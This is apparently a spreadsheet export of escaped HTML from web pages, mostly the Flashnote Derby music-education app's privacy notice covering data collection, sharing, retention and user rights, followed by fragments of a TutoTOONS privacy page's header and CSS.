						&lt;img src="https://flashnotederby.com/wp-content/uploads/2016/10/horse-for-web-icon.png" alt="Flashnote Apps for Music Education" id="logo" data-height-percentage="54" /&gt;
					&lt;/a&gt;
				&lt;/div&gt;
				&lt;div id="et-top-navigation" data-height="66" data-fixed-height="40"&gt;
											&lt;nav id="top-menu-nav"&gt;
						&lt;ul id="top-menu" class="nav"&gt;&lt;li id="menu-item-367" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-367"&gt;&lt;a href="https://flashnotederby.com/"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-121" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-121"&gt;&lt;a href="https://flashnotederby.com/support"&gt;Support&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-366" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-366"&gt;&lt;a href="https://flashnotederby.com/note-naming-video-lessons/"&gt;Video lessons&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;						&lt;/nav&gt;
					&lt;div id="et_mobile_nav_menu"&gt;
				&lt;div class="mobile_nav closed"&gt;
					&lt;span class="select_page"&gt;Select Page&lt;/span&gt;
					&lt;span class="mobile_menu_bar mobile_menu_bar_toggle"&gt;&lt;/span&gt;
				&lt;/div&gt;
			&lt;/div&gt;				&lt;/div&gt; &lt;!--</t>
  </si>
  <si>
    <t>#et-top-navigation --&gt;
			&lt;/div&gt; &lt;!-- .container --&gt;
			&lt;div class="et_search_outer"&gt;
				&lt;div class="container et_search_form_container"&gt;
					&lt;form role="search" method="get" class="et-search-form" action="https://flashnotederby.com/"&gt;
					&lt;input type="search" class="et-search-field" placeholder="Search &amp;hellip;" value="" name="s" title="Search for:" /&gt;					&lt;/form&gt;
					&lt;span class="et_close_search_field"&gt;&lt;/span&gt;
				&lt;/div&gt;
			&lt;/div&gt;
		&lt;/header&gt; &lt;!-- #main-header --&gt;
		&lt;div id="et-main-area"&gt;
&lt;div id="main-content"&gt;
	&lt;div class="container"&gt;
		&lt;div id="content-area" class="clearfix"&gt;
			&lt;div id="left-area"&gt;
				&lt;article id="post-1209" class="post-1209 page type-page status-publish hentry"&gt;
					&lt;h1 class="entry-title main_title"&gt;Flashnote Derby &amp;#8211; Privacy Policy&lt;/h1&gt;
					&lt;div class="entry-content"&gt;
					&lt;p&gt;&lt;strong&gt;&lt;span data-custom-class="title"&gt;PRIVACY NOTICE   &lt;/span&gt;  &lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span data-custom-class="subtitle"&gt;Last updated December 01, 2019 &lt;/span&gt;&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;This app, Flashnote Derby, was created by Luke D. Bartolomeo (“&lt;strong&gt;Company&lt;/strong&gt;”, “&lt;strong&gt;we&lt;/strong&gt;”, “&lt;strong&gt;us&lt;/strong&gt;”, or “&lt;strong&gt;our&lt;/strong&gt;”). We are committed to protecting your personal information and your right to privacy.</t>
  </si>
  <si>
    <t>If you have any questions or concerns about our notice, or our practices with regards to your personal information, please contact us at support@flashnotederby.com.&lt;/span&gt; &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;When you use our mobile application, you trust us with your personal information. We take your privacy very seriously. In this privacy notice, we seek to explain to you in the clearest way possible what information we collect, how we use it and what rights you have in relation to it.</t>
  </si>
  <si>
    <t xml:space="preserve">We hope you take some time to read through it carefully, as it is important. If there are any terms in this privacy notice  that you do not agree with, please discontinue use of our Apps and our services.&lt;/span&gt; &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;This privacy notice applies to all information collected through our mobile application,  &lt;/span&gt;&lt;span data-custom-class="body_text"&gt;(&amp;#8220;&lt;strong&gt;Apps&lt;/strong&gt;&amp;#8220;), and/or any related services, sales, marketing or events (we refer to them collectively in this privacy notice as the &amp;#8220;&lt;strong&gt;Services&lt;/strong&gt;&amp;#8220;).  &lt;/span&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span data-custom-class="body_text"&gt;Please read this privacy notice carefully as it will help you make informed decisions about sharing your personal information with us. </t>
  </si>
  <si>
    <t>&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;TABLE OF CONTENTS&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-1" data-custom-class="link"&gt;1. WHAT INFORMATION DO WE COLLECT?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-2" data-custom-class="link"&gt;2. HOW DO WE USE YOUR INFORMATION?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-3" data-custom-class="link"&gt;3.</t>
  </si>
  <si>
    <t>WILL YOUR INFORMATION BE SHARED WITH ANYONE?&lt;/a&gt;       &lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-4" data-custom-class="link"&gt;4. HOW LONG DO WE KEEP YOUR INFORMATION?  &lt;/a&gt;  &lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-5" data-custom-class="link"&gt;5.</t>
  </si>
  <si>
    <t>HOW DO WE KEEP YOUR INFORMATION SAFE?&lt;/a&gt;   &lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-6" data-custom-class="link"&gt;6. WHAT ARE YOUR PRIVACY RIGHTS?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-7" data-custom-class="link"&gt;7. CONTROLS FOR DO-NOT-TRACK FEATURES&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-8" data-custom-class="link"&gt;8.</t>
  </si>
  <si>
    <t>DO CALIFORNIA RESIDENTS HAVE SPECIFIC PRIVACY RIGHTS?&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-9" data-custom-class="link"&gt;9. DO WE MAKE UPDATES TO THIS POLICY?&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="#sec-10" data-custom-class="link"&gt;10. HOW CAN YOU CONTACT US ABOUT THIS POLICY?&lt;/a&gt;&lt;/p&gt;
&lt;p id="infocollect"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-1"&gt;&lt;/a&gt;1.</t>
  </si>
  <si>
    <t>WHAT INFORMATION DO WE COLLECT?&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span data-custom-class="heading_2"&gt;Information automatically collected&lt;/span&gt;&lt;/strong&gt; &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt;&lt;/em&gt; &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;Some information – such as IP address and/or browser and device characteristics – is collected automatically when you visit our Apps.&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;We automatically collect certain information when you visit, use or navigate the Apps. This information does not reveal your specific identity (like your name or contact information) but may include device and usage information, such as your IP address, browser and device characteristics, operating system, language preferences, referring URLs, device name, country, location, information about how and when you use our Apps and other technical information.</t>
  </si>
  <si>
    <t xml:space="preserve">This information is primarily needed to maintain the security and operation of our Apps, and for our internal analytics and reporting purposes.&lt;/span&gt;  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span data-custom-class="heading_2"&gt;Information collected through our Apps&lt;/span&gt;&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt;&lt;/em&gt;  &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;We may collect information regarding your&lt;/span&gt; mobile device, when you use our apps.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;If you use our Apps, we may also collect the following information:&lt;/span&gt;       &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;Mobile Device Data.&lt;/span&gt;&lt;/em&gt;&lt;span data-custom-class="body_text"&gt;  We may automatically collect device information (such as your mobile device ID, model and manufacturer), operating system, version information and IP address. &lt;/span&gt;   </t>
  </si>
  <si>
    <t>&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;br /&gt;
 &lt;a id="sec-2"&gt;&lt;/a&gt;2. HOW DO WE USE YOUR INFORMATION?&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt; &lt;/em&gt; &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;We process your information for purposes based on legitimate business interests, the fulfillment of our contract with you, compliance with our legal obligations, and/or your consent.&lt;/span&gt;&lt;/em&gt;  &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;We use personal information collected via our Apps for a variety of business purposes described below. We process your personal information for these purposes in reliance on our legitimate business interests, in order to enter into or perform a contract with you, with your consent, and/or for compliance with our legal obligations.</t>
  </si>
  <si>
    <t xml:space="preserve">We indicate the specific processing grounds we rely on next to each purpose listed below.&lt;/span&gt; &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;We use the information we collect or receive: &lt;/span&gt;                                                                                                                                 &lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;span data-custom-class="body_text"&gt;For other Business Purposes.&lt;/span&gt;&lt;/strong&gt;&lt;span data-custom-class="body_text"&gt; We may use your information for other Business Purposes, such as data analysis, identifying usage trends, determining the effectiveness of our promotional campaigns and to evaluate and improve our Apps, products, marketing and your experience. &lt;/span&gt;&lt;span data-custom-class="body_text"&gt;We may use and store this information in aggregated and anonymized form so that it is not associated with individual end users and does not include personal information. We will not use identifiable personal information without your consent. &lt;/span&gt;           </t>
  </si>
  <si>
    <t>&lt;/li&gt;
&lt;/ul&gt;
&lt;p id="infoshare"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-3"&gt;&lt;/a&gt;3. WILL YOUR INFORMATION BE SHARED WITH ANYONE?&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt; &lt;/em&gt; &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;We only share information with your consent, to comply with laws, to provide you with services, to protect your rights, or to fulfill business obligations.  &lt;/span&gt;&lt;/em&gt;  &lt;/p&gt;
&lt;div&gt;&lt;span data-custom-class="body_text"&gt;We may process or share data based on the following legal basis:&lt;/span&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Consent:&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We may process your data if you have given us specific consent to use your personal information in a specific purpose. 
 &lt;p&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Legitimate Interests:&lt;/strong&gt; We may process your data when it is reasonably necessary to achieve our legitimate business interests. 
</t>
  </si>
  <si>
    <t>&lt;p&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Performance of a Contract:  &lt;/strong&gt;Where we have entered into a contract with you, we may process your personal information to fulfill the terms of our contract. 
 &lt;p&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Legal Obligations:&lt;/strong&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">We may disclose your information where we are legally required to do so in order to comply with applicable law, governmental requests, a judicial proceeding, court order, or legal process, such as in response to a court order or a subpoena (including in response to public authorities to meet national security or law enforcement requirements). 
 &lt;p&gt; &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span data-custom-class="body_text"&gt;&lt;strong&gt;Vital Interests:&lt;/strong&gt; We may disclose your information where we believe it is necessary to investigate, prevent, or take action regarding potential violations of our policies, suspected fraud, situations involving potential threats to the safety of any person and illegal activities, or as evidence in litigation in which we are involved.&lt;br /&gt;
 &lt;/span&gt;   </t>
  </si>
  <si>
    <t>&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;p id="inforetain"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-4"&gt;&lt;/a&gt;4. HOW LONG DO WE KEEP YOUR INFORMATION?&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt; &lt;/em&gt; &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;We keep your information for as long as necessary to fulfill the purposes outlined in this privacy notice unless otherwise required by law.&lt;/span&gt; &lt;/em&gt;  &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;We will only keep your personal information for as long as it is necessary for the purposes set out in this privacy notice, unless a longer retention period is required or permitted by law (such as tax, accounting or other legal requirements). No purpose in this policy will require us keeping your personal information for longer than 1 year .&lt;/span&gt;  &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;When we have no ongoing legitimate business need to process your personal information, we will either delete or anonymize it, or, if this is not possible (for example, because your personal information has been stored in backup archives), then we will securely store your personal information and isolate it from any further processing until deletion is possible.&lt;/span&gt;   &lt;/p&gt;
&lt;div&gt; &lt;/div&gt;
&lt;p id="infosafe"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-5"&gt;&lt;/a&gt;5.</t>
  </si>
  <si>
    <t>HOW DO WE KEEP YOUR INFORMATION SAFE? &lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt; &lt;/em&gt; &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;We aim to protect your personal information through a system of organizational and technical security measures.&lt;/span&gt;&lt;/em&gt;  &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;We have implemented appropriate technical and organizational security measures designed to protect the security of any personal information we process. However, please also remember that we cannot guarantee that the internet itself is 100% secure.</t>
  </si>
  <si>
    <t xml:space="preserve">Although we will do our best to protect your personal information, transmission of personal information to and from our Apps is at your own risk. You should only access the services within a secure environment.&lt;/span&gt;&lt;span data-custom-class="body_text"&gt;  &lt;/span&gt; &lt;/p&gt;
&lt;p id="privacyrights"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-6"&gt;&lt;/a&gt;6. WHAT ARE YOUR PRIVACY RIGHTS?&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt; &lt;/em&gt; &lt;/strong&gt;&lt;span data-custom-class="body_text"&gt;&lt;em&gt; In some regions, such as the European Economic Area, you have rights that allow you greater access to and control over your personal information. You may review, change, or terminate your account at any time.&lt;/em&gt;&lt;/span&gt;   &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;In some regions (like the European Economic Area), you have certain rights under applicable data protection laws.</t>
  </si>
  <si>
    <t>These may include the right (i) to request access and obtain a copy of your personal information, (ii) to request rectification or erasure; (iii) to restrict the processing of your personal information; and (iv) if applicable, to data portability. In certain circumstances, you may also have the right to object to the processing of your personal information. To make such a request, please use the&lt;/span&gt; &lt;span data-custom-class="body_text"&gt;&lt;a href="https://app.termly.io/dashboard/website/307311/privacy-policy#contact" data-custom-class="link"&gt;contact details &lt;/a&gt; &lt;/span&gt;&lt;span data-custom-class="body_text"&gt; provided below.</t>
  </si>
  <si>
    <t xml:space="preserve">We will consider and act upon any request in accordance with applicable data protection laws.&lt;/span&gt; &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;If we are relying on your consent to process your personal information, you have the right to withdraw your consent at any time. Please note however that this will not affect the lawfulness of the processing before its withdrawal.  &lt;/span&gt;  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;span data-custom-class="body_text"&gt;If you are resident in the European Economic Area and you believe we are unlawfully processing your personal information, you also have the right to complain to your local data protection supervisory authority. You can find their contact details here:&lt;/span&gt; &lt;span data-custom-class="body_text"&gt;&lt;a href="http://ec.europa.eu/justice/data-protection/bodies/authorities/index_en.htm" target="_blank" rel="noopener" data-custom-class="link"&gt;http://ec.europa.eu/justice/data-protection/bodies/authorities/index_en.htm&lt;/a&gt;.  &lt;/span&gt;        &lt;/p&gt;
&lt;p id="DNT"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;br /&gt;
 &lt;a id="sec-7"&gt;&lt;/a&gt;7.</t>
  </si>
  <si>
    <t>CONTROLS FOR DO-NOT-TRACK FEATURES&lt;/span&gt; &lt;/strong&gt;  &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;Most web browsers and some mobile operating systems and mobile applications include a Do-Not-Track (“DNT”) feature or setting you can activate to signal your privacy preference not to have data about your online browsing activities monitored and collected. No uniform technology standard for recognizing and implementing DNT signals has been finalized.</t>
  </si>
  <si>
    <t xml:space="preserve">As such, we do not currently respond to DNT browser signals or any other mechanism that automatically communicates your choice not to be tracked online. If a standard for online tracking is adopted that we must follow in the future, we will inform you about that practice in a revised version of this privacy notice  .&lt;/span&gt;  &lt;/p&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-8"&gt;&lt;/a&gt;8. DO CALIFORNIA RESIDENTS HAVE SPECIFIC PRIVACY RIGHTS?&lt;/span&gt; &lt;/strong&gt; &lt;/div&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt; &lt;/em&gt; &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;Yes, if you are a resident of California, you are granted specific rights regarding access to your personal information. </t>
  </si>
  <si>
    <t>&lt;/span&gt;&lt;/em&gt;  &lt;/p&gt;
 &lt;p&gt;&lt;span data-custom-class="body_text"&gt;California Civil Code Section 1798.83, also known as the “Shine The Light” law, permits our users who are California residents to request and obtain from us, once a year and free of charge, information about categories of personal information (if any) we disclosed to third parties for direct marketing purposes and the names and addresses of all third parties with which we shared personal information in the immediately preceding calendar year. If you are a California resident and would like to make such a request, please submit your request in writing to us using the contact information provided below.&lt;/span&gt; &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;If you are under 18 years of age, reside in California, and have a registered account with the Apps, you have the right to request removal of unwanted data that you publicly post on the Apps.</t>
  </si>
  <si>
    <t xml:space="preserve">To request removal of such data, please contact us using the contact information provided below, and include the email address associated with your account and a statement that you reside in California. We will make sure the data is not publicly displayed on the Apps, but please be aware that the data may not be completely or comprehensively removed from our systems.&lt;/span&gt;&lt;/p&gt;
&lt;p id="policyupdates"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-9"&gt;&lt;/a&gt;9. DO WE MAKE UPDATES TO THIS POLICY?&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;In Short:&lt;/span&gt; &lt;/em&gt; &lt;/strong&gt;&lt;em&gt;&lt;span data-custom-class="body_text"&gt;Yes, we will update this policy as necessary to stay compliant with relevant laws.&lt;/span&gt;&lt;/em&gt;  &lt;/p&gt;
&lt;p&gt;&lt;span data-custom-class="body_text"&gt;We may update this privacy notice from time to time. The updated version will be indicated by an updated “Revised” date and the updated version will be effective as soon as it is accessible. If we make material changes to this privacy notice, we may notify you either by prominently posting a notice of such changes or by directly sending you a notification.</t>
  </si>
  <si>
    <t xml:space="preserve">We encourage you to review this privacy notice frequently to be informed of how we are protecting your information.  &lt;/span&gt; &lt;/p&gt;
&lt;p id="contact"&gt;&lt;strong&gt;&lt;span data-custom-class="heading_1"&gt;&lt;a id="sec-10"&gt;&lt;/a&gt;10. HOW CAN YOU CONTACT US ABOUT THIS POLICY?&lt;/span&gt; &lt;/strong&gt; &lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;span data-custom-class="body_text"&gt;If you have questions or comments about this policy, you may email us at support@flashnotederby.com or by post to:&lt;/span&gt;&lt;/p&gt;
&lt;div&gt;&lt;span data-custom-class="body_text"&gt;Luke D. Bartolomeo&lt;/span&gt;&lt;span data-custom-class="body_text"&gt;  &lt;/span&gt; &lt;span data-custom-class="body_text"&gt; &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span data-custom-class="body_text"&gt;415 S Ridgeland Ave &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span data-custom-class="body_text"&gt;#2 &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span data-custom-class="body_text"&gt;Oak Park, IL 60302  &lt;/span&gt;&lt;span data-custom-class="body_text"&gt;  &lt;/span&gt;&lt;/div&gt;
&lt;div&gt;&lt;span data-custom-class="body_text"&gt;United States      &lt;/span&gt;&lt;span data-custom-class="body_text"&gt;  &lt;/span&gt; &lt;/div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;/div&gt;
					&lt;/div&gt; &lt;!-- .entry-content --&gt;
				&lt;/article&gt; &lt;!-- .et_pb_post --&gt;
			&lt;/div&gt; &lt;!--</t>
  </si>
  <si>
    <t>#left-area --&gt;
					&lt;/div&gt; &lt;!-- #content-area --&gt;
	&lt;/div&gt; &lt;!-- .container --&gt;
&lt;/div&gt; &lt;!-- #main-content --&gt;
			&lt;footer id="main-footer"&gt;
				&lt;div id="footer-bottom"&gt;
					&lt;div class="container clearfix"&gt;
									&lt;/div&gt;	&lt;!-- .container --&gt;
				&lt;/div&gt;
			&lt;/footer&gt; &lt;!--</t>
  </si>
  <si>
    <t>#main-footer --&gt;
		&lt;/div&gt; &lt;!-- #et-main-area --&gt;
	&lt;/div&gt; &lt;!-- #page-container --&gt;
		&lt;script type="text/javascript"&gt;
		var et_animation_data = [];
	&lt;/script&gt;
	&lt;script type='text/javascript' src='https://flashnotederby.com/wp-content/plugins/helpie/asset-files/vendors/highlight/highlight.pack.js?ver=1.7'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;! [CDATA[ */
var et_shortcodes_strings = {"previous":"Previous","next":"Next"};
var et_pb_custom = {"ajaxurl":"https:\/\/flashnotederby.com\/wp-admin\/admin-ajax.php","images_uri":"https:\/\/flashnotederby.com\/wp-content\/themes\/Divi\/images","builder_images_uri":"https:\/\/flashnotederby.com\/wp-content\/themes\/Divi\/includes\/builder\/images","et_frontend_nonce":"866d873bbc","subscription_failed":"Please, check the fields below to make sure you entered the correct information.</t>
  </si>
  <si>
    <t>","et_ab_log_nonce":"75ff0201ce","fill_message":"Please, fill in the following fields:","contact_error_message":"Please, fix the following errors:","invalid":"Invalid email","captcha":"Captcha","prev":"Prev","previous":"Previous","next":"Next","wrong_captcha":"You entered the wrong number in captcha. ","is_builder_plugin_used":"","ignore_waypoints":"no","is_divi_theme_used":"1","widget_search_selector":".widget_search","is_ab_testing_active":"","page_id":"1209","unique_test_id":"","ab_bounce_rate":"5","is_cache_plugin_active":"no","is_shortcode_tracking":""};
var et_pb_box_shadow_elements = [];
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://flashnotederby.com/wp-content/themes/Divi/js/custom.min.js?ver=3.0.105'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://flashnotederby.com/wp-content/themes/Divi/core/admin/js/common.js?ver=3.0.105'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://flashnotederby.com/wp-includes/js/wp-embed.min.js?ver=4.9.4'&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>css2?family=Montserrat:wght@100;300;400;600;700&amp;display=swap" rel="stylesheet"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/cookieconsent.css?v=1681340136"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="https://tutotoons.com/assets/scss/master.min.css?v=1681340136"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</si>
  <si>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html&gt;_x005F_x000D_
&lt;html lang="en"&gt;_x005F_x000D_
_x005F_x000D_
&lt;head&gt;_x005F_x000D_
   &lt;meta charset="utf-8"&gt;_x005F_x000D_
          &lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;_x005F_x000D_
       &lt;meta name="description" content="At TutoTOONS, we create games that cherish the childhood and let kids explore the world while playing what they love!"&gt;_x005F_x000D_
   &lt;meta name="keywords" content="kids games, educational kids games, beautifly designed games, free game making software, build games free, game design software, learn build games for kids, build games on ipad, iphone, create games"&gt;_x005F_x000D_
   &lt;meta name="theme-color" content="#265561"&gt;_x005F_x000D_
      &lt;title&gt;Privacy Policy - TutoTOONS.com&lt;/title&gt;_x005F_x000D_
_x005F_x000D_
   &lt;!-- base root directory --&gt;_x005F_x000D_
   &lt;base href="https://tutotoons.com/"&gt;_x005F_x000D_
   &lt;!-- FONT--&gt;_x005F_x000D_
   &lt;link href="//fonts.googleapis.com/</t>
  </si>
  <si>
    <t>css?family=Open+Sans:400,300,600" rel="stylesheet" type="text/css"&gt;_x005F_x000D_
   &lt;!-- ICONS--&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css"&gt;_x005F_x000D_
   &lt;link rel="stylesheet" href="assets/packages/simple-line-icons/css/simple-line-icons.css"&gt;_x005F_x000D_
   &lt;!-- mobile check  --&gt;_x005F_x000D_
   &lt;script src="assets/packages/jquery.browser/dist/jquery.browser.js"&gt;&lt;/script&gt;_x005F_x000D_
   &lt;!-- var js  --&gt;_x005F_x000D_
   &lt;script type="text/javascript"&gt;_x005F_x000D_
_x005F_x000D_
   if ( window.jQBrowser.mobile &amp;&amp; top.location !</t>
  </si>
  <si>
    <t>START HEADER--&gt;_x005F_x000D_
    &lt;header&gt;&lt;/header&gt;_x005F_x000D_
    &lt;!-- END HEADER--&gt;_x005F_x000D_
    &lt;main id="wrap" class="privacy_policy"&gt;_x005F_x000D_
&lt;script src="https://code.jquery.com/jquery-3.2.1.min.js" type="text/javascript"&gt;&lt;/script&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="assets/packages/bootstrap/dist/css/bootstrap.css"&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="assets/packages/simple-line-icons/css/simple-line-icons.css"&gt;_x005F_x000D_
&lt;link rel="stylesheet" href="assets/css/frontend_styles.css?v=1.210" id="stylescss"&gt;_x005F_x000D_
_x005F_x000D_
&lt;style&gt;_x005F_x000D_
  p {_x005F_x000D_
    font-size: 13px ! important;_x005F_x000D_
    font-weight:</t>
  </si>
  <si>
    <t xml:space="preserve">normal;_x005F_x000D_
    line-height: 19px;_x005F_x000D_
    margin: 0;_x005F_x000D_
    color: #6b6b6b;_x005F_x000D_
    margin-block-start: 1em;_x005F_x000D_
    margin-block-end: 1em;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  table,_x005F_x000D_
  table tr th,_x005F_x000D_
  table tr td {_x005F_x000D_
    text-align: left;_x005F_x000D_
    font-size: 14px ! important;_x005F_x000D_
_ x000D_
    line-height: 18px;_x005F_x000D_
    line-height: 19px;_x005F_x000D_
    color: #6b6b6b_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  table tr th {_x005F_x000D_
    font-weight: bold;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  thead {_x005F_x000D_
    border-bottom: solid 1px #000;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  table {_x005F_x000D_
    margin-top: 30px;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  ul {_x005F_x000D_
    margin-top: 10px;_x005F_x000D_
    font-size: 13px;_x005F_x000D_
    font-weight: normal;_x005F_x000D_
    color: #6b6b6b;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  section {_x005F_x000D_
    margin-bottom: 15px;_x005F_x000D_
    padding-bottom: 15px;_x005F_x000D_
    margin-top: 10px;_x005F_x000D_
    border-bottom: 1px solid #ccc;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  a.go_to {_x005F_x000D_
    display: block;_x005F_x000D_
    font-weight: 800;_x005F_x000D_
    font-size: 15px;_x005F_x000D_
    color: #000;_x005F_x000D_
    cursor: pointer;_x005F_x000D_
    margin-bottom: 10px;_x005F_x000D_
    text-transform: uppercase;_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  a.go_to:hover {_x005F_x000D_
    color: #a3a3a3;_x005F_x000D_
_x005F_x000D_
  }_x005F_x000D_
_x005F_x000D_
  .privacy_policy a.go_to.no-styling {_x005F_x000D_
    display: inline;_x005F_x000D_
    font-weight: normal;_x005F_x000D_
    font-size: 1em;_x005F_x000D_
